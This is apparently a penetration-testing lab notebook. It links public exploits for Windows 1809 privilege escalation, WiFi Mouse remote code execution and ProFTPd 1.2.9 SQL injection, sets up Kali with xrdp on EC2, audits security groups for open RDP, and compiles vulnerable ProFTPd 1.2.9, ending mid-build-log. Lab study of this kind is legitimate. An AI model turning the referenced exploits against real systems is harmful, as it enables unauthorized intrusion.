[Privilege-escalation helper: installing and using windows-exploit-suggester.py](https://blog.csdn.net/weixin_45650977/article/details/112554489)
[GitHub: AonCyberLabs / Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
[Introduction to penetration testing and hands-on practice](https://ithelp.ithome.com.tw/users/20107475/ironman/1374)

Searching for exploits against Windows 1809
![image](https://hackmd.io/_uploads/BJvx_umgC.png)
> [Exploit Database](https://www.exploit-db.com/search?q=1809&platform=windows)

## Exploit used
[Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation](https://www.exploit-db.com/exploits/47135)
### EC2 Windows Server 2019 Base build number
![image](https://hackmd.io/_uploads/SJwCR_7g0.png)
Windows Server 2019 shares the 17763 build line with Windows 10 1809, so whether a "1809" local privilege escalation applies is decided by the exact build and the installed updates shown here, not by the version name alone.
### Switching to another exploit
`sudo yum install python3`
`sudo yum install python3-pip`
`pip3 install requests`
(`yum` means these ran on a yum-based instance such as Amazon Linux; Kali uses `apt`.)
## Exploits
[WiFi Mouse 1.7.8.5 - Remote Code Execution (v2)](https://www.exploit-db.com/exploits/50972)

# Installing Kali
[Setting up a Kali Linux EC2 platform on AWS (chapter 2)](https://medium.com/aws-cloud-penetration-testing-offensive-security/setting-up-a-kali-linux-ec2-platform-on-aws-chapter-2-9ee38e9f6d1a)
### Disk full :(
![image](https://hackmd.io/_uploads/S1kJ8DLxC.png)
### Switched to 100 GB, that should be enough
![image](https://hackmd.io/_uploads/Bk5zdOIxC.png)
### 100 GB is enough! 43 GB used in total (the first three commands alone used only 11 GB)
These are the preparatory steps from the reference site (`kali-linux-everything` pulls in every Kali package, which is what consumes the extra disk):
1. `sudo apt update && sudo apt install -y kali-linux-headless`
2. `sudo apt update && sudo apt install -y kali-desktop-xfce`
3. `sudo apt-get update && sudo apt-get -y upgrade`
4. `sudo apt-get install -y kali-linux-everything`
### Remember the extra commands that set up xrdp
5. `sudo apt update`
6. `sudo apt install -y xrdp`
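The xrdp service installed above will listen on TCP 3389, which has to be opened in the instance's security group before the RDP client can reach it, and opening that rule to `0.0.0.0/0` is the usual mistake. The following is an added example for these notes, not AWS tooling: it audits the JSON that `aws ec2 describe-security-groups --output json` returns for rules that expose 3389 to the whole internet, and builds the `--ip-permissions` document that pins the rule to one source address. The group IDs and addresses in the constructed sample are placeholders; the function names are this example's own.

```python
"""Audit an EC2 security group for RDP open to the world and build a pinned rule.

Added example for these notes; it is not AWS code. Feed it the JSON from
`aws ec2 describe-security-groups --group-ids <sg> --output json`.
"""
import ipaddress
import json

ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"

# Constructed sample in the shape of describe-security-groups output; the
# group IDs and addresses are placeholders, not values from the notes.
SAMPLE_SG_JSON = json.dumps({"SecurityGroups": [{
    "GroupId": "sg-0123456789abcdef0", "GroupName": "kali-lab",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "203.0.113.10/32", "Description": "workstation"}],
         "Ipv6Ranges": [], "UserIdGroupPairs": []},
        # the risky rule: RDP from anywhere, IPv4 and IPv6
        {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
         "IpRanges": [{"CidrIp": ANY_V4}], "Ipv6Ranges": [{"CidrIpv6": ANY_V6}],
         "UserIdGroupPairs": []},
        # all traffic, but only from another security group: not a finding
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [],
         "UserIdGroupPairs": [{"GroupId": "sg-0fedcba9876543210"}]},
    ]}]})


def rule_covers_port(rule, port):
    """True if an IpPermissions entry matches TCP `port` ('-1' means all protocols and ports)."""
    if rule.get("IpProtocol") == "-1":
        return True
    if rule.get("IpProtocol") != "tcp":
        return False
    return rule.get("FromPort", 0) <= port <= rule.get("ToPort", 65535)


def exposed_sources(sg_json, port=3389):
    """(group_id, cidr) for every rule that lets the whole internet reach TCP `port`."""
    findings = []
    for sg in json.loads(sg_json)["SecurityGroups"]:
        for rule in sg.get("IpPermissions", []):
            if not rule_covers_port(rule, port):
                continue
            cidrs = ([r["CidrIp"] for r in rule.get("IpRanges", [])]
                     + [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])])
            findings.extend((sg["GroupId"], c) for c in cidrs if c in (ANY_V4, ANY_V6))
    return findings


def restricted_ingress(my_ip, port=3389, description="admin RDP"):
    """One IpPermissions entry for authorize-security-group-ingress, pinned to a single host."""
    addr = ipaddress.ip_address(my_ip)  # raises ValueError on anything that is not an address
    perm = {"IpProtocol": "tcp", "FromPort": port, "ToPort": port}
    if addr.version == 4:
        perm["IpRanges"] = [{"CidrIp": f"{addr}/32", "Description": description}]
    else:
        perm["Ipv6Ranges"] = [{"CidrIpv6": f"{addr}/128", "Description": description}]
    return perm


if __name__ == "__main__":
    for group_id, cidr in exposed_sources(SAMPLE_SG_JSON):
        print(f"{group_id}: TCP 3389 open from {cidr}")
    # Replacement rule; the address would come from `curl -s https://checkip.amazonaws.com`
    print(json.dumps([restricted_ingress("203.0.113.10")]))
```

Apply the pinned rule with `aws ec2 authorize-security-group-ingress --group-id <sg> --ip-permissions '<the JSON list printed above>'`, then remove the open one with `aws ec2 revoke-security-group-ingress --group-id <sg> --protocol tcp --port 3389 --cidr 0.0.0.0/0` (and again with `--cidr ::/0` if IPv6 was allowed). The `-1` protocol branch matters because an "all traffic from 0.0.0.0/0" rule exposes 3389 just as much as an explicit RDP rule.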
7. `sudo service xrdp start`
8. `sudo update-rc.d xrdp enable` (on a systemd-based Kali, `sudo systemctl enable --now xrdp` does steps 7 and 8 in one go)

### Set up an account and password (replace `<newusername>` with your own account name)
* `sudo adduser <newusername>`
* `sudo usermod -aG sudo <newusername>`

### Remember to open inbound rule 3389 (RDP) in the Security Group
Restrict the rule's source to your own public address (`<your-ip>/32`) rather than `0.0.0.0/0`: exposed RDP endpoints are scanned and brute-forced continuously, and this instance holds a full Kali toolset plus a sudo-capable account protected by nothing more than the password set above.

## Kali is up
![image](https://hackmd.io/_uploads/ryZo2OIgC.png)

## Installing a visual monitor
* `sudo apt update`
* `sudo apt install htop`
* `htop`
![image](https://hackmd.io/_uploads/H1C9JtIlR.png)

### Other exploits
[ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection](https://www.exploit-db.com/exploits/43)

# Week 7
### Monday's htop
![image](https://hackmd.io/_uploads/ByC28-qlC.png)
kth (as shown in htop) is running at 100%
![image](https://hackmd.io/_uploads/SkqbuW9g0.png)

## Related commands
```
┌──(root㉿kali)-[/home/iris]
└─# cd Downloads

┌──(root㉿kali)-[/home/iris/Downloads]
└─# ls
7c85503b160a36a96594ef75f3180a07-proftpd-1.2.9.tar.bz2

┌──(root㉿kali)-[/home/iris/Downloads]
└─# tar -xvjf 7c85503b160a36a96594ef75f3180a07-proftpd-1.2.9.tar.bz2

┌──(root㉿kali)-[/home/iris/Downloads/proftpd-1.2.9]
└─# ./configure

┌──(root㉿kali)-[/home/iris/Downloads/proftpd-1.2.9]
└─# make
echo \#define BUILD_STAMP \"`date`\" >include/buildstamp.h
cd lib/ && make lib
make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/lib'
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pr_fnmatch.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c sstrncpy.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c strsep.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c vsnprintf.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-glob.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-hstrerror.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c glibc-mkstemp.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pr-syslog.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c pwgrent.c
gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c getopt.c
gcc -DLINUX -I..
-I../include -O2 -Wall -Wno-long-double -c getopt1.c ar rc libsupp.a pr_fnmatch.o sstrncpy.o strsep.o vsnprintf.o glibc-glob.o glibc-hstrerror.o glibc-mkstemp.o pr-syslog.o pwgrent.o getopt.o getopt1.o ranlib libsupp.a make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/lib' cd src/ && make src make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/src' gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c main.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c timers.c timers.c: In function ‘sig_alarm’: timers.c:146:3: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 146 | siginterrupt(SIGALRM, 1); | ^~~~~~~~~~~~ In file included from /usr/include/x86_64-linux-gnu/sys/wait.h:36, from ../include/conf.h:78, from timers.c:31: /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ timers.c: In function ‘set_sig_alarm’: timers.c:174:3: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 174 | siginterrupt(SIGALRM, 1); | ^~~~~~~~~~~~ /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c sets.c gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c pool.c pool.c: In function ‘fd_cleanup_cb’: pool.c:751:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 751 | close((int)fdv); | ^ pool.c: In function ‘register_fd_cleanups’: pool.c:755:23: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 755 | register_cleanup(p, (void *)fd, fd_cleanup_cb, fd_cleanup_cb); | ^ pool.c: In function ‘pclosef’: pool.c:773:25: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 773 | unregister_cleanup(p, (void *)fd, fd_cleanup_cb); | ^ pool.c: In function ‘pfclose’: pool.c:833:3: warning: pointer ‘fd’ used after ‘fclose’ [-Wuse-after-free] 833 | unregister_cleanup(p, (void *) fd, file_cleanup_cb); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ pool.c:832:9: note: call to ‘fclose’ here 832 | res = fclose(fd); | ^~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c regexp.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c dirtree.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c support.c support.c: In function ‘pr_memscrub’: support.c:822:43: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 822 | memscrub_ctr += (17 + (unsigned char)((int) p & 0xF)); | ^ support.c: In function ‘sreplace’: support.c:805:1: warning: function may return address of local variable [-Wreturn-local-addr] 805 | } | ^ support.c:725:8: note: declared here 725 | char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL; | ^~~ support.c:725:8: note: declared here At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c netaddr.c gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c inet.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c log.c log.c: In function ‘log_xfer’: log.c:116:5: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 7 has type ‘off_t’ {aka ‘long int ’} [-Wformat=] 116 | "%s %ld %s %" PR_LU " %s %c _ %c %c %s ftp %c %s %c\n", | ^~~~~~~~~~~~~ 117 | fmt_time(time(NULL)), xfertime, remhost, fsize, fbuf, xfertype, direction, | ~~~~~ | | | off_t {aka long int} In file included from log.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" log.c: In function ‘log_wtmp’: log.c:229:10: warning: passing argument 1 of ‘time’ from incompatible pointer type [-Wincompatible-pointer-types] 229 | time(&ut.ut_time); | ^ | | | int32_t * {aka int *} In file included from ../include/conf.h:155: /usr/include/time.h:76:29: note: expected ‘time_t *’ {aka ‘long int *’} but argument is of type ‘int32_t *’ {aka ‘int *’} 76 | extern time_t time (time_t *__timer) __THROW; | ~~~~~~~~^~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c bindings.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c scoreboard.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c feat.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c netio.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c response.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c ident.c gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c data.c data.c: In function ‘data_pasv_open’: data.c:262:33: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 5 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 262 | pr_response_send(R_150, "Opening %s mode data connection for %s " | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 263 | "(%" PR_LU " bytes)", MODE_STRING, reason, size); | ~~~~ | | | off_t {aka long int} In file included from data.c:32: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" data.c: In function ‘data_active_open’: data.c:362:33: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 5 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 362 | pr_response_send(R_150, "Opening %s mode data connection for %s " | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 363 | "(%" PR_LU " bytes)", MODE_STRING, reason, size); | ~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" data.c: In function ‘pr_data_open’: data.c:505:5: warning: ‘siginterrupt’ is deprecated: Use sigaction with SA_RESTART instead [-Wdeprecated-declarations] 505 | siginterrupt(SIGURG, 1); | ^~~~~~~~~~~~ In file included from /usr/include/x86_64-linux-gnu/sys/wait.h:36, from ../include/conf.h:78: /usr/include/signal.h:324:12: note: declared here 324 | extern int siginterrupt (int __sig, int __interrupt) __THROW | ^~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c modules.c gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c auth.c auth.c: In function ‘auth_setpwent’: auth.c:89:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 89 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_endpwent’: auth.c:104:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 104 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_setgrent’: auth.c:119:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 119 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_endgrent’: auth.c:134:13: warning: variable ‘mr’ set but not used [-Wunused-but-set-variable] 134 | modret_t *mr = NULL; | ^~ auth.c: In function ‘auth_getpwuid’: auth.c:251:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 251 | cmd = make_cmd(p, 1, (void *) uid); | ^ auth.c: In function ‘auth_getgrgid’: auth.c:318:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 318 | cmd = make_cmd(p, 1, (void *) gid); | ^ auth.c: In function ‘auth_uid_name’: auth.c:393:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 393 | cmd = make_cmd(p, 1, (void *) uid); | ^ auth.c: In function ‘auth_gid_name’: auth.c:418:24: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 418 | cmd = make_cmd(p, 1, (void *) gid); | ^ auth.c: In function ‘auth_name_uid’: auth.c:444:11: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 444 | res = (uid_t) mr->data; | ^ auth.c: In function ‘auth_name_gid’: auth.c:465:11: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 465 | res = (gid_t) mr->data; | ^ auth.c: In function ‘auth_getgroups’: auth.c:497:11: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 497 | res = (int) mr->data; | ^ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc 
-DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c fsio.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mkhome.c make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/src' cd modules/ && make modules make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/modules' gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_core.c mod_core.c: In function ‘set_masqueradeaddress’: mod_core.c:728:15: warning: variable ‘c’ set but not used [-Wunused-but-set-variable] 728 | config_rec *c = NULL; | ^ mod_core.c: In function ‘add_virtualhost’: mod_core.c:2571:17: warning: variable ‘addr’ set but not used [-Wunused-but-set-variable] 2571 | pr_netaddr_t *addr = NULL; | ^~~~ mod_core.c: In function ‘format_size_str’: mod_core.c:2674:25: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2674 | snprintf(buf, buflen, "%.3" PR_LU "%cB", size, units[i]); | ^~~~~ ~~~~ | | | off_t {aka long int} In file included from mod_core.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_display_file’: mod_core.c:2705:38: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2705 | snprintf(mg_size, sizeof(mg_size), "%" PR_LU, fs_size); | ^~~ ~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2752:50: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2752 | snprintf(mg_xfer_bytes, sizeof(mg_xfer_bytes), "%" PR_LU, | ^~~ 2753 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2754:50: warning: format ‘%llu’ expects argument 
of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2754 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "B", | ^~~ 2755 | session.total_bytes); | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2758:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ 2759 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2762:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2762 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "MB", | ^~~ 2763 | session.total_bytes >> 20); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2766:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2766 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "GB", | ^~~ 2767 | session.total_bytes >> 30); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_size’: mod_core.c:3877:30: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘__off_t’ {aka ‘ long int’} [-Wformat=] 3877 | pr_response_add(R_213, "%" PR_LU, sbuf.st_size); | ^~~ ~~~~~~~~~~~~ | | | __off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_mdtm’: 
mod_core.c:3844:41: warning: ‘%02d’ directive output may be truncated writing between 2 and 11 bytes into a region of size between 5 and 12 [-Wformat-truncation=] 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~ mod_core.c:3844:36: note: directive argument in the range [-2147483647, 2147483647] 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~~~~~~~~~~~~~~~~~~~~~~~ mod_core.c:3844:9: note: ‘snprintf’ output between 15 and 67 bytes into a destination of size 16 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3845 | tm->tm_year+1900,tm->tm_mon+1,tm->tm_mday, | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3846 | tm->tm_hour,tm->tm_min,tm->tm_sec); | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_core.c: In function ‘core_display_file’: mod_core.c:2758:52: warning: ‘%llu’ directive output may be truncated writing between 2 and 16 bytes into a region of size 12 [-Wformat-truncation=] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ mod_core.c:2758:53: note: format string is defined here 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", mod_core.c:2758:52: note: directive argument in the range [10, 9007199254740991] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ mod_core.c:2758:5: note: ‘snprintf’ output between 5 and 19 bytes into a destination of size 12 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2759 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. 
-I../include -O2 -Wall -Wno-long-double -c mod_xfer.c mod_xfer.c: In function ‘_log_transfer’: mod_xfer.c:258:21: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 258 | log_debug(DEBUG1, "Transfer %s %" PR_LU " bytes in %ld.%02lu seconds", | ^~~~~~~~~~~~~~~ 259 | abort_flag == 'c' ? "completed:" : "aborted after", 260 | session.xfer.total_bytes, (long) end_time.tv_sec, | ~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} In file included from mod_xfer.c:32: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_rate_lookup’: mod_xfer.c:413:23: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 413 | log_debug(DEBUG3, "TransferRate (%.3Lf KB/s, %" PR_LU | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 414 | " bytes free) in effect%s", xfer_rate_kbps, xfer_rate_freebytes, | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_stor’: mod_xfer.c:1293:26: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1293 | log_pri(PR_LOG_INFO, "MaxStoreFileSize (%" PR_LU " byte%s) reached: " | ^~~~~~~~~~~~~~~~~~~~~ 1294 | "aborting transfer of '%s'", nbytes_max_store, | ~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c:1320:28: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1320 | log_pri(PR_LOG_INFO, "MaxStoreFileSize (%" PR_LU " bytes) reached: " | ^~~~~~~~~~~~~~~~~~~~~ 1321 | "aborting transfer of '%s'", nbytes_max_store, dir); | ~~~~~~~~~~~~~~~~ | | | off_t {aka long int} 
../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_retr’: mod_xfer.c:1565:26: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1565 | log_pri(PR_LOG_INFO, "MaxRetrieveFileSize (%" PR_LU " byte%s) reached: " | ^~~~~~~~~~~~~~~~~~~~~~~~ 1566 | "aborting transfer of '%s'", nbytes_max_retrieve, | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_auth_unix.c mod_auth_unix.c: In function ‘pw_getpwuid’: mod_auth_unix.c:373:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 373 | uid = (uid_t)cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_getgrgid’: mod_auth_unix.c:421:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 421 | gid = (gid_t)cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_uid_name’: mod_auth_unix.c:780:12: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 780 | id.uid = (uid_t) cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_gid_name’: mod_auth_unix.c:811:12: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 811 | id.gid = (gid_t) cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_name_uid’: mod_auth_unix.c:852:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 852 | return mod_create_data(cmd, (void *) pw->pw_uid); | ^ mod_auth_unix.c: In function ‘pw_name_gid’: mod_auth_unix.c:869:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 869 | return mod_create_data(cmd, (void *) gr->gr_gid); | ^ mod_auth_unix.c: In function ‘pw_getgroups’: 
mod_auth_unix.c:950:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 950 | return mod_create_data(cmd, (void *) gids->nelts); | ^ mod_auth_unix.c:953:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 953 | return mod_create_data(cmd, (void *) groups->nelts); | ^ mod_auth_unix.c: In function ‘pw_uid_name’: mod_auth_unix.c:798:38: warning: ‘snprintf’ output may be truncated before the last format character [-Wformat-truncation=] 798 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.uid); | ^ mod_auth_unix.c:798:7: note: ‘snprintf’ output between 2 and 11 bytes into a destination of size 10 798 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.uid); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_auth_unix.c: In function ‘pw_gid_name’: mod_auth_unix.c:832:38: warning: ‘snprintf’ output may be truncated before the last format character [-Wformat-truncation=] 832 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.gid); | ^ mod_auth_unix.c:832:7: note: ‘snprintf’ output between 2 and 11 bytes into a destination of size 10 832 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.gid); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_auth_file.c mod_auth_file.c: In function ‘authfile_getpwuid’: mod_auth_file.c:632:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 632 | uid_t uid = (uid_t) cmd->argv[0]; | ^ mod_auth_file.c: In function ‘authfile_name2uid’: mod_auth_file.c:658:37: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 658 | return pwd ? 
